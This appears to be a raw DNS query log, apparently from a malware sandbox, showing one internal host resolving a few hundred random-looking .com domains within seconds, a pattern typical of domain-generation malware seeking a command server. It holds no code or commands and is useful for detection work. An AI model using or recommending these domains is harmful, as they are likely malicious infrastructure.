Nov 11, 2024 18:13:18.446471930 CET	192.168.2.6	1.1.1.1	0x90e0	Standard query (0)	vofymem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.446652889 CET	192.168.2.6	1.1.1.1	0x8780	Standard query (0)	puzylol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.446893930 CET	192.168.2.6	1.1.1.1	0xd675	Standard query (0)	lyxylor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.446893930 CET	192.168.2.6	1.1.1.1	0xb4a4	Standard query (0)	gaqydus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.448504925 CET	192.168.2.6	1.1.1.1	0x6277	Standard query (0)	puvyxeq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.450031042 CET	192.168.2.6	1.1.1.1	0x3481	Standard query (0)	vojyquf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.450985909 CET	192.168.2.6	1.1.1.1	0xc014	Standard query (0)	vowydic.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.451258898 CET	192.168.2.6	1.1.1.1	0xcbf9	Standard query (0)	gaqycyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.454384089 CET	192.168.2.6	1.1.1.1	0xafb0	Standard query (0)	gadyneh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.455332994 CET	192.168.2.6	1.1.1.1	0x85d3	Standard query (0)	puzywuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.455419064 CET	192.168.2.6	1.1.1.1	0xf24f	Standard query (0)	volykit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.455507994 CET	192.168.2.6	1.1.1.1	0x6f8c	Standard query (0)	vofygaf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.455848932 CET	192.168.2.6	1.1.1.1	0x8e9d	Standard query (0)	pufygav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.887855053 CET	192.168.2.6	1.1.1.1	0x66d1	Standard query (0)	pujymel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.888700008 CET	192.168.2.6	1.1.1.1	0x4ef8	Standard query (0)	qekyqyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.888892889 CET	192.168.2.6	1.1.1.1	0x6a9	Standard query (0)	qebylov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.890531063 CET	192.168.2.6	1.1.1.1	0x7bb7	Standard query (0)	ganyzas.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.925281048 CET	192.168.2.6	1.1.1.1	0xac78	Standard query (0)	lykymyr.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.927119017 CET	192.168.2.6	1.1.1.1	0x2d4c	Standard query (0)	vopydum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.935216904 CET	192.168.2.6	1.1.1.1	0xad2f	Standard query (0)	puvyliv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.937324047 CET	192.168.2.6	1.1.1.1	0xbe71	Standard query (0)	qexykug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.938000917 CET	192.168.2.6	1.1.1.1	0x8ce0	Standard query (0)	qedyvuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.947695971 CET	192.168.2.6	1.1.1.1	0xb01c	Standard query (0)	volyjym.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.952626944 CET	192.168.2.6	1.1.1.1	0x9185	Standard query (0)	pufybop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.954875946 CET	192.168.2.6	1.1.1.1	0x34fe	Standard query (0)	qekyheq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.955817938 CET	192.168.2.6	1.1.1.1	0xb60a	Standard query (0)	gadyvis.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.957076073 CET	192.168.2.6	1.1.1.1	0x534	Standard query (0)	pumytol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.962369919 CET	192.168.2.6	1.1.1.1	0xb090	Standard query (0)	lymylij.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.963838100 CET	192.168.2.6	1.1.1.1	0x8416	Standard query (0)	gadyduz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.964721918 CET	192.168.2.6	1.1.1.1	0x868e	Standard query (0)	vofydut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.965133905 CET	192.168.2.6	1.1.1.1	0xb65f	Standard query (0)	qexyqyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.965476036 CET	192.168.2.6	1.1.1.1	0x30e2	Standard query (0)	gaqyzoh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.968450069 CET	192.168.2.6	1.1.1.1	0xa3d6	Standard query (0)	gacykub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.969825983 CET	192.168.2.6	1.1.1.1	0xcbf9	Standard query (0)	qeqyloq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.970702887 CET	192.168.2.6	1.1.1.1	0x2f69	Standard query (0)	qegyfil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.971116066 CET	192.168.2.6	1.1.1.1	0xf0d0	Standard query (0)	vofybic.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.971998930 CET	192.168.2.6	1.1.1.1	0xf1f7	Standard query (0)	vocyquc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.972551107 CET	192.168.2.6	1.1.1.1	0x4bc7	Standard query (0)	galyheh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.973356962 CET	192.168.2.6	1.1.1.1	0x6425	Standard query (0)	lyxymed.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.974281073 CET	192.168.2.6	1.1.1.1	0x8e4c	Standard query (0)	pufydul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.979049921 CET	192.168.2.6	1.1.1.1	0x6623	Standard query (0)	vowyzam.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.993957043 CET	192.168.2.6	1.1.1.1	0xc213	Standard query (0)	vonyrot.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.000782967 CET	192.168.2.6	1.1.1.1	0xb0d6	Standard query (0)	puzyjyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.001224995 CET	192.168.2.6	1.1.1.1	0x8dda	Standard query (0)	lyxyjun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.001669884 CET	192.168.2.6	1.1.1.1	0xe446	Standard query (0)	qetysuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.002187014 CET	192.168.2.6	1.1.1.1	0x2500	Standard query (0)	puryxag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.002480984 CET	192.168.2.6	1.1.1.1	0x8431	Standard query (0)	gatyduh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.002775908 CET	192.168.2.6	1.1.1.1	0xf75b	Standard query (0)	puzymev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.002947092 CET	192.168.2.6	1.1.1.1	0x720e	Standard query (0)	lyvylod.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.003192902 CET	192.168.2.6	1.1.1.1	0xa37f	Standard query (0)	lyryxen.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.003354073 CET	192.168.2.6	1.1.1.1	0x5730	Standard query (0)	qeqytal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.005784035 CET	192.168.2.6	1.1.1.1	0x923b	Standard query (0)	lymytar.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.005948067 CET	192.168.2.6	1.1.1.1	0x73d1	Standard query (0)	lygynox.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.006078959 CET	192.168.2.6	1.1.1.1	0x7bb6	Standard query (0)	vowypek.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.006220102 CET	192.168.2.6	1.1.1.1	0x930d	Standard query (0)	lyrysyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.006361961 CET	192.168.2.6	1.1.1.1	0x8c24	Standard query (0)	pupycuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.006561995 CET	192.168.2.6	1.1.1.1	0xba5c	Standard query (0)	ganyriz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.006695986 CET	192.168.2.6	1.1.1.1	0x7983	Standard query (0)	lykygaj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.006910086 CET	192.168.2.6	1.1.1.1	0xa43a	Standard query (0)	vopycyf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.007074118 CET	192.168.2.6	1.1.1.1	0xe236	Standard query (0)	qebyrip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.007217884 CET	192.168.2.6	1.1.1.1	0xbcc2	Standard query (0)	gatycyb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.007356882 CET	192.168.2.6	1.1.1.1	0xd2c5	Standard query (0)	pujygaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.007487059 CET	192.168.2.6	1.1.1.1	0x4b5c	Standard query (0)	puvywup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.007641077 CET	192.168.2.6	1.1.1.1	0x4754	Standard query (0)	lyvywux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.007791996 CET	192.168.2.6	1.1.1.1	0xd812	Standard query (0)	vojygok.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.007921934 CET	192.168.2.6	1.1.1.1	0xe65f	Standard query (0)	gacyqys.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.008071899 CET	192.168.2.6	1.1.1.1	0x9a74	Standard query (0)	pupydig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.008212090 CET	192.168.2.6	1.1.1.1	0x903e	Standard query (0)	qetyxeg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.008344889 CET	192.168.2.6	1.1.1.1	0xa7ee	Standard query (0)	gahyfow.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.008550882 CET	192.168.2.6	1.1.1.1	0x1a90	Standard query (0)	purypyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.008758068 CET	192.168.2.6	1.1.1.1	0x24a0	Standard query (0)	vocykif.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.013705015 CET	192.168.2.6	1.1.1.1	0x4a91	Standard query (0)	gaqypew.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.013941050 CET	192.168.2.6	1.1.1.1	0x5ef5	Standard query (0)	gahynaz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.014976025 CET	192.168.2.6	1.1.1.1	0x6c55	Standard query (0)	lysyvud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.015901089 CET	192.168.2.6	1.1.1.1	0x7aee	Standard query (0)	lygyfir.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.016407013 CET	192.168.2.6	1.1.1.1	0xe27d	Standard query (0)	vojymet.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.043648005 CET	192.168.2.6	1.1.1.1	0xb370	Standard query (0)	qegynap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.587090969 CET	192.168.2.6	1.1.1.1	0x7d36	Standard query (0)	pufypeg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.588407993 CET	192.168.2.6	1.1.1.1	0x7485	Standard query (0)	gaqykus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.589355946 CET	192.168.2.6	1.1.1.1	0xd6d5	Standard query (0)	vonykuk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.589879036 CET	192.168.2.6	1.1.1.1	0xf9d3	Standard query (0)	qexynol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.590614080 CET	192.168.2.6	1.1.1.1	0x5013	Standard query (0)	lygysen.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.591537952 CET	192.168.2.6	1.1.1.1	0x2218	Standard query (0)	vowykuc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.592168093 CET	192.168.2.6	1.1.1.1	0x11a7	Standard query (0)	gacynow.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.592746019 CET	192.168.2.6	1.1.1.1	0x6c9c	Standard query (0)	purylup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.594424963 CET	192.168.2.6	1.1.1.1	0xf492	Standard query (0)	qegysyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.595309019 CET	192.168.2.6	1.1.1.1	0x6602	Standard query (0)	vocymak.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.596435070 CET	192.168.2.6	1.1.1.1	0xf757	Standard query (0)	gahydyb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.598180056 CET	192.168.2.6	1.1.1.1	0xfb25	Standard query (0)	lyrylix.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.599354029 CET	192.168.2.6	1.1.1.1	0x70a3	Standard query (0)	qetylip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.602087975 CET	192.168.2.6	1.1.1.1	0x72b4	Standard query (0)	puvymaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.604391098 CET	192.168.2.6	1.1.1.1	0x5efa	Standard query (0)	vojyduf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.606467962 CET	192.168.2.6	1.1.1.1	0x4d31	Standard query (0)	gatyzoz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.607089996 CET	192.168.2.6	1.1.1.1	0x3513	Standard query (0)	lyvymej.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.616146088 CET	192.168.2.6	1.1.1.1	0xb71f	Standard query (0)	pujyduv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.663487911 CET	192.168.2.6	1.1.1.1	0xf463	Standard query (0)	qebyqeq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.663676977 CET	192.168.2.6	1.1.1.1	0xa1d0	Standard query (0)	vopyzot.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.663973093 CET	192.168.2.6	1.1.1.1	0xcfd	Standard query (0)	pupyxal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.665519953 CET	192.168.2.6	1.1.1.1	0xeb06	Standard query (0)	ganyqyh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.668554068 CET	192.168.2.6	1.1.1.1	0x45af	Standard query (0)	lykyfud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.673340082 CET	192.168.2.6	1.1.1.1	0xfb09	Standard query (0)	pujybig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.673340082 CET	192.168.2.6	1.1.1.1	0xbf62	Standard query (0)	lymywun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.673648119 CET	192.168.2.6	1.1.1.1	0x2fb9	Standard query (0)	purytov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.675338984 CET	192.168.2.6	1.1.1.1	0x911b	Standard query (0)	gaqyrib.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.676750898 CET	192.168.2.6	1.1.1.1	0xe9c8	Standard query (0)	gadycew.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.681298018 CET	192.168.2.6	1.1.1.1	0x4300	Standard query (0)	pumyliq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.681543112 CET	192.168.2.6	1.1.1.1	0x12f1	Standard query (0)	pupypep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.681823015 CET	192.168.2.6	1.1.1.1	0x106	Standard query (0)	galynab.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.685739040 CET	192.168.2.6	1.1.1.1	0xc242	Standard query (0)	volymaf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.686079979 CET	192.168.2.6	1.1.1.1	0xcce1	Standard query (0)	qekynog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.686430931 CET	192.168.2.6	1.1.1.1	0x69aa	Standard query (0)	ganykuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.686430931 CET	192.168.2.6	1.1.1.1	0x4abb	Standard query (0)	lykynon.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.686728001 CET	192.168.2.6	1.1.1.1	0x91d5	Standard query (0)	qebykul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.687000990 CET	192.168.2.6	1.1.1.1	0xe901	Standard query (0)	lyvyjyr.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.687166929 CET	192.168.2.6	1.1.1.1	0xa36e	Standard query (0)	qekyfiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.687342882 CET	192.168.2.6	1.1.1.1	0xd5fd	Standard query (0)	vopypec.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.687530041 CET	192.168.2.6	1.1.1.1	0x8ec5	Standard query (0)	gatypas.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.692348957 CET	192.168.2.6	1.1.1.1	0xf23	Standard query (0)	qedysyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.692548037 CET	192.168.2.6	1.1.1.1	0xc112	Standard query (0)	lysysyx.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.692548037 CET	192.168.2.6	1.1.1.1	0x4a5d	Standard query (0)	qetytav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.692682981 CET	192.168.2.6	1.1.1.1	0xb45f	Standard query (0)	lygyvuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.692828894 CET	192.168.2.6	1.1.1.1	0xd738	Standard query (0)	lyrytod.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.692828894 CET	192.168.2.6	1.1.1.1	0x7288	Standard query (0)	vowyrif.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.692997932 CET	192.168.2.6	1.1.1.1	0x232c	Standard query (0)	vojybim.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.694839001 CET	192.168.2.6	1.1.1.1	0xd083	Standard query (0)	pumywug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.694958925 CET	192.168.2.6	1.1.1.1	0xfe35	Standard query (0)	vofycyk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.702749014 CET	192.168.2.6	1.1.1.1	0x77e8	Standard query (0)	qeqyrug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.702852011 CET	192.168.2.6	1.1.1.1	0x4cb2	Standard query (0)	puzygop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.703107119 CET	192.168.2.6	1.1.1.1	0xb780	Standard query (0)	gahyvuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.703107119 CET	192.168.2.6	1.1.1.1	0xcf23	Standard query (0)	qedyxel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.703202963 CET	192.168.2.6	1.1.1.1	0x7032	Standard query (0)	qegyvuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.704376936 CET	192.168.2.6	1.1.1.1	0xd282	Standard query (0)	vocyjet.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.704905033 CET	192.168.2.6	1.1.1.1	0x5747	Standard query (0)	puvyjyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.705060959 CET	192.168.2.6	1.1.1.1	0x2d0a	Standard query (0)	gacyhez.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.705277920 CET	192.168.2.6	1.1.1.1	0xb132	Standard query (0)	volygoc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.705403090 CET	192.168.2.6	1.1.1.1	0x9e6d	Standard query (0)	galyfis.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.705751896 CET	192.168.2.6	1.1.1.1	0xfcdf	Standard query (0)	lysyxar.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.705751896 CET	192.168.2.6	1.1.1.1	0x6d89	Standard query (0)	qexyhap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.706665039 CET	192.168.2.6	1.1.1.1	0x7e62	Standard query (0)	pufycyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.707174063 CET	192.168.2.6	1.1.1.1	0x5e02	Standard query (0)	lyxygax.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.709225893 CET	192.168.2.6	1.1.1.1	0xcd89	Standard query (0)	vonyqym.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.618684053 CET	192.168.2.6	1.1.1.1	0xf79b	Standard query (0)	qeqykyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.619395018 CET	192.168.2.6	1.1.1.1	0x895a	Standard query (0)	puzybil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.620013952 CET	192.168.2.6	1.1.1.1	0xa8aa	Standard query (0)	vofypam.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.621299982 CET	192.168.2.6	1.1.1.1	0x72ba	Standard query (0)	volybut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.624954939 CET	192.168.2.6	1.1.1.1	0x275f	Standard query (0)	qedytoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.634982109 CET	192.168.2.6	1.1.1.1	0x34d9	Standard query (0)	lymyjyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.636842966 CET	192.168.2.6	1.1.1.1	0x1c32	Standard query (0)	pufyxov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.639591932 CET	192.168.2.6	1.1.1.1	0xe26b	Standard query (0)	gatyruw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.643301964 CET	192.168.2.6	1.1.1.1	0x4a8d	Standard query (0)	ganyhab.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.645035028 CET	192.168.2.6	1.1.1.1	0x5a55	Standard query (0)	lysytoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.649049044 CET	192.168.2.6	1.1.1.1	0x1ccd	Standard query (0)	qexyfuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.649630070 CET	192.168.2.6	1.1.1.1	0x1c77	Standard query (0)	pupytiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.650126934 CET	192.168.2.6	1.1.1.1	0xf936	Standard query (0)	qebyhag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.652508974 CET	192.168.2.6	1.1.1.1	0xbcd9	Standard query (0)	pujycyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.673523903 CET	192.168.2.6	1.1.1.1	0xb913	Standard query (0)	vopyrik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.674518108 CET	192.168.2.6	1.1.1.1	0xf82d	Standard query (0)	qekyvup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.674673080 CET	192.168.2.6	1.1.1.1	0xac35	Standard query (0)	lyxynir.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.676588058 CET	192.168.2.6	1.1.1.1	0xbce5	Standard query (0)	lykyvyx.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.677191973 CET	192.168.2.6	1.1.1.1	0xf2f2	Standard query (0)	vocygim.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.677731037 CET	192.168.2.6	1.1.1.1	0x1ca2	Standard query (0)	lyrywur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.681488037 CET	192.168.2.6	1.1.1.1	0x145e	Standard query (0)	qetyrul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.681719065 CET	192.168.2.6	1.1.1.1	0xea1c	Standard query (0)	qegyxav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.682128906 CET	192.168.2.6	1.1.1.1	0x8297	Standard query (0)	purywyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.682281017 CET	192.168.2.6	1.1.1.1	0x5b99	Standard query (0)	lyvygon.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.684179068 CET	192.168.2.6	1.1.1.1	0x152d	Standard query (0)	puvygog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.687968016 CET	192.168.2.6	1.1.1.1	0x9f93	Standard query (0)	puryjeq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.688148975 CET	192.168.2.6	1.1.1.1	0x432c	Standard query (0)	vocybuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.691435099 CET	192.168.2.6	1.1.1.1	0xf751	Standard query (0)	gadypah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.693393946 CET	192.168.2.6	1.1.1.1	0x3bf9	Standard query (0)	pumyjev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.693624020 CET	192.168.2.6	1.1.1.1	0x39a7	Standard query (0)	gaqyqez.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.694818974 CET	192.168.2.6	1.1.1.1	0x3ddb	Standard query (0)	galyvuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.694983006 CET	192.168.2.6	1.1.1.1	0x4c6f	Standard query (0)	vowyqyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.695797920 CET	192.168.2.6	1.1.1.1	0x67f6	Standard query (0)	lyxyfuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.696161032 CET	192.168.2.6	1.1.1.1	0x9df9	Standard query (0)	vonyjef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.697710037 CET	192.168.2.6	1.1.1.1	0xb5d7	Standard query (0)	vojycec.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.698121071 CET	192.168.2.6	1.1.1.1	0xefd6	Standard query (0)	gahyces.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.698900938 CET	192.168.2.6	1.1.1.1	0x6fb7	Standard query (0)	lygyxad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.699640036 CET	192.168.2.6	1.1.1.1	0x9eb3	Standard query (0)	qegytop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.702440977 CET	192.168.2.6	1.1.1.1	0x9d2d	Standard query (0)	gacyfih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.715711117 CET	192.168.2.6	1.1.1.1	0x8eef	Standard query (0)	pujypal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.716809988 CET	192.168.2.6	1.1.1.1	0xcbc9	Standard query (0)	gatykyh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.718575954 CET	192.168.2.6	1.1.1.1	0x2ed9	Standard query (0)	qetykyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.719157934 CET	192.168.2.6	1.1.1.1	0xf25f	Standard query (0)	gahypoz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.719912052 CET	192.168.2.6	1.1.1.1	0xd8f9	Standard query (0)	lykyser.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.721678019 CET	192.168.2.6	1.1.1.1	0x31e8	Standard query (0)	qebyniv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.722029924 CET	192.168.2.6	1.1.1.1	0xed93	Standard query (0)	vojypat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.723270893 CET	192.168.2.6	1.1.1.1	0x3d83	Standard query (0)	lyryjej.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.725675106 CET	192.168.2.6	1.1.1.1	0xb83c	Standard query (0)	lyvynid.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.744380951 CET	192.168.2.6	1.1.1.1	0x17ab	Standard query (0)	ganynos.com	A (IP address)	IN (0x0001)	false
